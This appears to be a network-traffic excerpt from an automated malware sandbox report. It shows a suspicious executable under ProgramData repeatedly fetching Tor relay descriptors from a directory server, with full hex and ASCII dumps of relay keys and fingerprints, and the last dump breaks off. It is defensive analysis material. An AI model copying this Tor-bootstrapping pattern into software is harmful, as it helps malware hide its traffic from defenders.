36 54 6b 6d 6c 39 35 36 76 32 4b 51 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 62 3a 66 34 63 32 3a 31 3a 3a 31 37 33 5d 3a 31 31 31 37 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 37 3a 34 35 3a 34 38 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 37 41 37 32 20 44 41 33 31 20 32 37 42 45 20 30 39 41 38 20 30 32 32 35 20 35 41 36 30 20 30 43 44 30 20 42 34 45 39 20 37 37 38 35 20 46 35 46 44 0a 75 70 74 69 6d 65 20 31 30 38 30 31 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 35 35 30 34 33 38 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 30 32 39 37 44 37 30 43 36 37 35 34 39 37 36 38 30 39 46 30 39 34 41 30 33 36 45 30 45 37 42 44 33 30 45 43 30 45 45 46 20 34 57 4d 51 6e 34 76 62 42 4e 66 45 46 4f 39 31 32 31 53 79 33 56 6a 79 2b 6c 4a 7a 69 4b 32 6e 6c 6e 4d 67 67 2f 31 6a 77 74 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 7a 4f 31 34 63 76 52 5a 52 4f 32 49 4e 57 67 54 57 70 6a 52 42 4e 64 52 37 66 76 71 45 36 6e 56 50 6e 73 43 32 46 42 52 4f 34 38 70 2f 79 52 7a 68 66 4d 51 43 57 0a 5a 6f 64 2f 54 76 77 76 63 33 70 59 32 70 66 4f 42 75 6a 73 32 38 6c 4c 51 66 32 57 65 4b 31 32 74 46 6f 4a 46 75 73 4b 37 76 32 41 42 61 76 2b 6d 39 31 2b 49 51 61 6b 51 66 78 6c 41 64 4d 66 0a 77 74 62 42 42 70 64 4f 39 62 4e 71 2b 47 6c 69 73 55 7a 43 36 51 58 4d 62 38 6f 71 6f 46 33 77 45 2b 4f 50 76 70 59 56 47 2f 4b 56 55 4d 6f 7a 79 76 75 48 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                      Data Ascii: router relayon1173 185.220.101.173 11173 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxqiAemf3ubQT388vR0Lh8bGDs8ncvT0Fx94ffb1goyz9ZzsAQAgBACMwQvt3mi1xlseKhhM5wCMoRJBxvoHevpOSaX3nq/YpGNxuV3DyAvg0Ws5AZDowRiZeuQd7k8+mK6m1VBf/zV8Tr2kXZBClKkWTK/c3o0x1AR3MQRh+Weiar2r1bU6ygM=-----END ED25519 CERT-----master-key-ed25519 jMEL7d5otcZbHioYTOcAjKESQcb6B3r6Tkml956v2KQor-address [2a0b:f4c2:1::173]:11173platform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 17:45:48fingerprint 7A72 DA31 27BE 09A8 0225 5A60 0CD0 B4E9 7785 F5FDuptime 10801bandwidth 1073741824 1073741824 15504384extra-info-digest 0297D70C6754976809F094A036E0E7BD30EC0EEF 4WMQn4vbBNfEFO9121Sy3Vjy+lJziK2nlnMgg/1jwt8onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKzO14cvRZRO2INWgTWpjRBNdR7fvqE6nVPnsC2FBRO48p/yRzhfMQCWZod/Tvwvc3pY2pfOBujs28lLQf2WeK12tFoJFusK7v2ABav+m91+IQakQfxlAdMfwtbBBpdO9bNq+GlisUzC6QXMb8oqoF3wE+OPvpYVG/KVUMozyvuHAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      22192.168.2.54973224.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:40.344760895 CET2830OUTGET /tor/server/fp/32361a1efdf684daedc8ca64843767a395f9eace HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:41.959980011 CET2831INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:41 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:41 GMT
                      Data Raw: 72 6f 75 74 65 72 20 4c 6f 75 6b 61 6e 69 6b 6f 73 20 31 34 36 2e 30 2e 33 36 2e 32 31 20 39 30 30 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 74 79 41 64 45 48 64 53 49 4a 32 72 78 49 79 49 2f 78 48 30 4f 6e 44 47 57 4b 42 57 58 45 67 57 36 78 45 61 31 79 51 42 50 44 53 41 53 35 41 51 41 67 42 41 42 65 35 4a 31 6d 0a 79 57 32 4b 61 5a 6d 32 2f 6b 67 41 74 48 42 68 39 31 74 63 6c 77 59 70 63 44 57 42 78 68 30 78 69 67 38 4b 53 70 35 2b 32 44 69 59 6b 30 7a 7a 4a 51 7a 49 4e 58 6c 4e 4c 4e 65 6e 75 54 42 67 0a 41 39 72 32 50 74 74 62 68 2b 36 37 74 33 66 71 35 72 61 53 50 73 76 66 49 74 78 74 37 53 48 32 46 6a 76 2f 73 37 59 59 6a 32 50 4a 51 35 76 45 33 75 4e 62 4a 5a 78 6f 38 51 6b 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 58 75 53 64 5a 73 6c 74 69 6d 6d 5a 74 76 35 49 41 4c 52 77 59 66 64 62 58 4a 63 47 4b 58 41 31 67 63 59 64 4d 59 6f 50 43 6b 6f 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 30 36 3a 33 32 3a 30 39 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 32 33 36 20 31 41 31 45 20 46 44 46 36 20 38 34 44 41 20 45 44 43 38 20 43 41 36 34 20 38 34 33 37 20 36 37 41 33 20 39 35 46 39 20 45 41 43 45 0a 75 70 74 69 6d 65 20 32 32 35 30 38 35 36 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 33 35 31 30 31 35 33 37 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 36 41 44 37 45 30 31 42 45 31 30 31 42 30 38 34 36 37 35 45 41 46 43 42 41 33 44 38 41 38 30 45 30 38 42 35 31 41 36 43 20 54 75 5a 44 48 50 6d 74 48 56 65 56 61 4d 4e 37 68 68 77 35 43 79 39 44 67 65 66 71 61 51 35 49 66 4f 76 2b 32 61 70 4f 6a 37 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 31 52 72 61 61 62 39 6b 66 54 36 71 41 71 69 43 4f 7a 52 37 70 41 6e 4f 4d 7a 74 4c 41 39 37 63 37 41 2f 69 46 6c 4f 68 57 45 37 71 48 76 46 65 4b 36 45 78 5a 33 0a 66 55 44 38 2b 36 58 35 50 76 6a 44 51 54 5a 62 65 76 79 6e 76 4d 69 36 53 46 50 31 72 4a 2b 4c 41 66 57 42 43 64 34 64 51 6d 56 74 37 65 66 37 2f 51 67 4a 72 78 67 52 55 74 30 41 6b 35 58 77 0a 57 45 70 49 4d 61 47 38 71 76 2f 4f 70 51 68 68 68 5a 4d 4d 6f 50 64 69 51 41 32 4d 62 31 77 4d 4e 41 61 62 5a 75 38 6f 34 73 42 74 5a 75 7a 34 70 39 7a 31 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 2f 4a 5a 4c 6d 36 6a
                      Data Ascii: router Loukanikos 146.0.36.21 9003 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxtyAdEHdSIJ2rxIyI/xH0OnDGWKBWXEgW6xEa1yQBPDSAS5AQAgBABe5J1myW2KaZm2/kgAtHBh91tclwYpcDWBxh0xig8KSp5+2DiYk0zzJQzINXlNLNenuTBgA9r2Pttbh+67t3fq5raSPsvfItxt7SH2Fjv/s7YYj2PJQ5vE3uNbJZxo8Qk=-----END ED25519 CERT-----master-key-ed25519 XuSdZsltimmZtv5IALRwYfdbXJcGKXA1gcYdMYoPCkoplatform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 06:32:09fingerprint 3236 1A1E FDF6 84DA EDC8 CA64 8437 67A3 95F9 EACEuptime 2250856bandwidth 1073741824 1073741824 35101537extra-info-digest 6AD7E01BE101B084675EAFCBA3D8A80E08B51A6C TuZDHPmtHVeVaMN7hhw5Cy9DgefqaQ5IfOv+2apOj78onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAN1Rraab9kfT6qAqiCOzR7pAnOMztLA97c7A/iFlOhWE7qHvFeK6ExZ3fUD8+6X5PvjDQTZbevynvMi6SFP1rJ+LAfWBCd4dQmVt7ef7/QgJrxgRUt0Ak5XwWEpIMaG8qv/OpQhhhZMMoPdiQA2Mb1wMNAabZu8o4sBtZuz4p9z1AgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAM/JZLm6j


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      23192.168.2.54973324.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:42.580558062 CET2838OUTGET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:43.443175077 CET2839INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:43 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:43 GMT
                      Data Raw: 72 6f 75 74 65 72 20 72 65 6c 61 79 6f 6e 31 31 37 33 20 31 38 35 2e 32 32 30 2e 31 30 31 2e 31 37 33 20 31 31 31 37 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 71 69 41 65 6d 66 33 75 62 51 54 33 38 38 76 52 30 4c 68 38 62 47 44 73 38 6e 63 76 54 30 46 78 39 34 66 66 62 31 67 6f 79 7a 39 5a 7a 73 41 51 41 67 42 41 43 4d 77 51 76 74 0a 33 6d 69 31 78 6c 73 65 4b 68 68 4d 35 77 43 4d 6f 52 4a 42 78 76 6f 48 65 76 70 4f 53 61 58 33 6e 71 2f 59 70 47 4e 78 75 56 33 44 79 41 76 67 30 57 73 35 41 5a 44 6f 77 52 69 5a 65 75 51 64 0a 37 6b 38 2b 6d 4b 36 6d 31 56 42 66 2f 7a 56 38 54 72 32 6b 58 5a 42 43 6c 4b 6b 57 54 4b 2f 63 33 6f 30 78 31 41 52 33 4d 51 52 68 2b 57 65 69 61 72 32 72 31 62 55 36 79 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 6a 4d 45 4c 37 64 35 6f 74 63 5a 62 48 69 6f 59 54 4f 63 41 6a 4b 45 53 51 63 62 36 42 33 72 36 54 6b 6d 6c 39 35 36 76 32 4b 51 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 62 3a 66 34 63 32 3a 31 3a 3a 31 37 33 5d 3a 31 31 31 37 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 37 3a 34 35 3a 34 38 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 37 41 37 32 20 44 41 33 31 20 32 37 42 45 20 30 39 41 38 20 30 32 32 35 20 35 41 36 30 20 30 43 44 30 20 42 34 45 39 20 37 37 38 35 20 46 35 46 44 0a 75 70 74 69 6d 65 20 31 30 38 30 31 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 35 35 30 34 33 38 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 30 32 39 37 44 37 30 43 36 37 35 34 39 37 36 38 30 39 46 30 39 34 41 30 33 36 45 30 45 37 42 44 33 30 45 43 30 45 45 46 20 34 57 4d 51 6e 34 76 62 42 4e 66 45 46 4f 39 31 32 31 53 79 33 56 6a 79 2b 6c 4a 7a 69 4b 32 6e 6c 6e 4d 67 67 2f 31 6a 77 74 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 7a 4f 31 34 63 76 52 5a 52 4f 32 49 4e 57 67 54 57 70 6a 52 42 4e 64 52 37 66 76 71 45 36 6e 56 50 6e 73 43 32 46 42 52 4f 34 38 70 2f 79 52 7a 68 66 4d 51 43 57 0a 5a 6f 64 2f 54 76 77 76 63 33 70 59 32 70 66 4f 42 75 6a 73 32 38 6c 4c 51 66 32 57 65 4b 31 32 74 46 6f 4a 46 75 73 4b 37 76 32 41 42 61 76 2b 6d 39 31 2b 49 51 61 6b 51 66 78 6c 41 64 4d 66 0a 77 74 62 42 42 70 64 4f 39 62 4e 71 2b 47 6c 69 73 55 7a 43 36 51 58 4d 62 38 6f 71 6f 46 33 77 45 2b 4f 50 76 70 59 56 47 2f 4b 56 55 4d 6f 7a 79 76 75 48 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                      Data Ascii: router relayon1173 185.220.101.173 11173 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxqiAemf3ubQT388vR0Lh8bGDs8ncvT0Fx94ffb1goyz9ZzsAQAgBACMwQvt3mi1xlseKhhM5wCMoRJBxvoHevpOSaX3nq/YpGNxuV3DyAvg0Ws5AZDowRiZeuQd7k8+mK6m1VBf/zV8Tr2kXZBClKkWTK/c3o0x1AR3MQRh+Weiar2r1bU6ygM=-----END ED25519 CERT-----master-key-ed25519 jMEL7d5otcZbHioYTOcAjKESQcb6B3r6Tkml956v2KQor-address [2a0b:f4c2:1::173]:11173platform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 17:45:48fingerprint 7A72 DA31 27BE 09A8 0225 5A60 0CD0 B4E9 7785 F5FDuptime 10801bandwidth 1073741824 1073741824 15504384extra-info-digest 0297D70C6754976809F094A036E0E7BD30EC0EEF 4WMQn4vbBNfEFO9121Sy3Vjy+lJziK2nlnMgg/1jwt8onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKzO14cvRZRO2INWgTWpjRBNdR7fvqE6nVPnsC2FBRO48p/yRzhfMQCWZod/Tvwvc3pY2pfOBujs28lLQf2WeK12tFoJFusK7v2ABav+m91+IQakQfxlAdMfwtbBBpdO9bNq+GlisUzC6QXMb8oqoF3wE+OPvpYVG/KVUMozyvuHAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      24192.168.2.54973424.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:43.673660994 CET2848OUTGET /tor/server/fp/32364bef873944be481e8bcc7fae9297f5f39781 HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:45.224827051 CET2850INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:44 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:44 GMT
                      Data Raw: 72 6f 75 74 65 72 20 74 69 72 7a 20 35 31 2e 31 35 38 2e 39 36 2e 31 32 32 20 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 7a 56 41 61 63 35 56 78 44 46 51 79 33 78 56 6a 58 6d 33 64 66 30 38 47 4c 65 43 5a 51 73 52 57 4a 36 6e 62 79 67 37 47 57 59 4d 67 50 41 41 51 41 67 42 41 44 72 32 53 53 52 0a 34 35 6c 55 34 6d 43 58 74 4d 41 55 79 4c 2b 47 76 52 38 4b 6f 74 49 4e 39 58 62 53 67 4d 38 6f 34 75 4e 72 66 2b 7a 6b 61 78 4c 64 76 2f 47 32 35 69 58 33 77 67 78 6c 31 47 57 4c 47 55 78 35 0a 45 67 58 52 32 76 32 5a 46 7a 6a 43 65 6e 48 75 53 45 76 42 49 4c 66 57 35 71 6f 51 52 2b 54 39 4f 54 69 45 49 35 4a 4b 44 33 33 4f 67 38 64 33 56 72 4e 6a 32 6b 4a 62 45 51 34 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 36 39 6b 6b 6b 65 4f 5a 56 4f 4a 67 6c 37 54 41 46 4d 69 2f 68 72 30 66 43 71 4c 53 44 66 56 32 30 6f 44 50 4b 4f 4c 6a 61 33 38 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 32 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 32 31 3a 34 30 3a 31 33 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 32 33 36 20 34 42 45 46 20 38 37 33 39 20 34 34 42 45 20 34 38 31 45 20 38 42 43 43 20 37 46 41 45 20 39 32 39 37 20 46 35 46 33 20 39 37 38 31 0a 75 70 74 69 6d 65 20 36 36 32 37 35 38 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 32 34 30 39 34 35 30 37 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 34 35 32 35 33 46 35 39 42 35 30 39 34 37 33 32 38 45 38 38 33 45 36 44 44 44 35 38 39 46 34 36 30 34 45 34 42 39 34 46 20 66 51 63 68 47 6f 66 74 41 52 55 56 67 38 6f 6c 53 51 4c 34 39 62 79 33 48 61 45 6b 33 77 35 76 2f 6b 5a 33 6b 7a 49 48 70 6f 49 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 70 75 41 4f 6c 33 51 45 63 56 61 43 6e 73 43 6c 6d 72 2f 35 49 6e 33 50 47 58 61 50 6c 45 74 6a 75 53 2f 46 73 37 6f 54 35 43 69 50 64 4a 77 33 6c 65 58 67 6f 70 0a 53 59 6d 38 6d 79 46 79 5a 49 47 52 43 4c 30 45 67 30 67 52 48 71 53 77 51 44 65 41 30 35 46 51 59 43 35 68 38 76 51 50 69 42 47 74 6f 53 46 57 2b 41 67 46 6b 48 54 47 75 34 36 62 6b 53 2f 6e 0a 4f 70 61 6a 73 42 42 76 52 77 6e 49 4f 6e 68 4c 43 43 31 2f 57 57 30 71 4c 2b 4a 71 61 68 68 6d 70 50 54 79 77 36 4c 61 32 4c 69 50 78 39 78 76 49 6c 55 4a 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 31 68 4a 49 2f 4d 75 47 65 4b 59 72 6b
                      Data Ascii: router tirz 51.158.96.122 443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxzVAac5VxDFQy3xVjXm3df08GLeCZQsRWJ6nbyg7GWYMgPAAQAgBADr2SSR45lU4mCXtMAUyL+GvR8KotIN9XbSgM8o4uNrf+zkaxLdv/G25iX3wgxl1GWLGUx5EgXR2v2ZFzjCenHuSEvBILfW5qoQR+T9OTiEI5JKD33Og8d3VrNj2kJbEQ4=-----END ED25519 CERT-----master-key-ed25519 69kkkeOZVOJgl7TAFMi/hr0fCqLSDfV20oDPKOLja38platform Tor 0.4.7.12 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 21:40:13fingerprint 3236 4BEF 8739 44BE 481E 8BCC 7FAE 9297 F5F3 9781uptime 662758bandwidth 1073741824 1073741824 24094507extra-info-digest 45253F59B50947328E883E6DDD589F4604E4B94F fQchGoftARUVg8olSQL49by3HaEk3w5v/kZ3kzIHpoIonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMpuAOl3QEcVaCnsClmr/5In3PGXaPlEtjuS/Fs7oT5CiPdJw3leXgopSYm8myFyZIGRCL0Eg0gRHqSwQDeA05FQYC5h8vQPiBGtoSFW+AgFkHTGu46bkS/nOpajsBBvRwnIOnhLCC1/WW0qL+JqahhmpPTyw6La2LiPx9xvIlUJAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAM1hJI/MuGeKYrk


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      25192.168.2.54973524.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:46.891283989 CET2857OUTGET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:48.145195961 CET2859INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:47 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:47 GMT
                      Data Raw: 72 6f 75 74 65 72 20 72 65 6c 61 79 6f 6e 31 31 37 33 20 31 38 35 2e 32 32 30 2e 31 30 31 2e 31 37 33 20 31 31 31 37 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 71 69 41 65 6d 66 33 75 62 51 54 33 38 38 76 52 30 4c 68 38 62 47 44 73 38 6e 63 76 54 30 46 78 39 34 66 66 62 31 67 6f 79 7a 39 5a 7a 73 41 51 41 67 42 41 43 4d 77 51 76 74 0a 33 6d 69 31 78 6c 73 65 4b 68 68 4d 35 77 43 4d 6f 52 4a 42 78 76 6f 48 65 76 70 4f 53 61 58 33 6e 71 2f 59 70 47 4e 78 75 56 33 44 79 41 76 67 30 57 73 35 41 5a 44 6f 77 52 69 5a 65 75 51 64 0a 37 6b 38 2b 6d 4b 36 6d 31 56 42 66 2f 7a 56 38 54 72 32 6b 58 5a 42 43 6c 4b 6b 57 54 4b 2f 63 33 6f 30 78 31 41 52 33 4d 51 52 68 2b 57 65 69 61 72 32 72 31 62 55 36 79 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 6a 4d 45 4c 37 64 35 6f 74 63 5a 62 48 69 6f 59 54 4f 63 41 6a 4b 45 53 51 63 62 36 42 33 72 36 54 6b 6d 6c 39 35 36 76 32 4b 